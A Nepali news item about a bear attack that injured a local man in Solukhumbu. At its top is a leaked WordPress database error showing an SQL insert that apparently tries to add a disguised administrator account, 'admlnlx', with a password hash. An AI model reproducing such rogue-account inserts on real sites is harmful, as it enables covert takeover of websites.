WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVCGBwq1hfFm2tg9mQNfHbHl.U9ZqI1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 17:24:41', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । सोलुखुम्बुको माप्यदुधकोशी गाउँपालिका ७ वाकुमा भालुको आक्रमणबाट एक जना घाईते भएका छन् । शनिबार भालुको आक्रमणमा परि स्थानिय ५० बर्षिय सञ्चमान विश्वकर्मा घाईते भएको माप्य दुधकोशी गाउँपालिका ६ वाकु चौकिका प्रहरी इन्चार्ज मनोज कुमार यादबले बताए ।
प्रहरी इन्चार्ज यादबका अनुसार विश्वकर्माको दाहिने हात, टाउको, अनुहार लगायतका शरिरका विभिन्न भागमा चोट लागेको छ । जिल्ला अस्पताल फाप्लुमा उपचार पछी थप उपचारको लागि काठमाण्डौ लगिएको पनि बताए ।
माप्यदुधकोशी गाउँपालिका ७ हाकुला बाट आफ्नो ससुराली हिडेका विश्वकमालाई शनिबार विहान ११ बजे जंगली भालुले आक्रमण गरेको हो ।